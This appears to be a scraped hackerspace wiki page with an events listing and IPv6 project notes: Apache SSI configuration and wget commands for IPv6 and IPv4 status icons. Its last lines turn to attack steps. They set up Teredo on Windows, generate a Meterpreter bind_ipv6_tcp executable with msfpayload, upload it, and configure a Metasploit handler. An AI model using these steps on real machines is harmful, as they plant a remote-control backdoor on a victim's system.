Contact
Sponsors
| ||||
|---|---|---|---|---|
| Day | Events | |||
| 05/21 Tuesday | 1930 - meetup 2000 Valná hromada | |||
| 05/22 Wednesday | 2200 Elektřina jinak @ Styx smart club = skoro přes řeku od brmlabu | |||
| 05/23 Thursday | 2000 Digital Signal Processing: Reloaded | |||
| 05/25 Saturday | ||||
| Day | Events | |||
The project is currently in the planning stage.
Check your web server support SSI
SetEnvIf Server_Addr "^2001:" IPV6
wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" /> <!--#else --> <img src="/images/ipv4.png" alt="IPv4 sad" /> <!--#endif -->
Finding IPv6 hosts
http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1

int ipv6 install netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip) netsh int ipv6 show teredo # we need qualified State msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe upload bind.exe msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp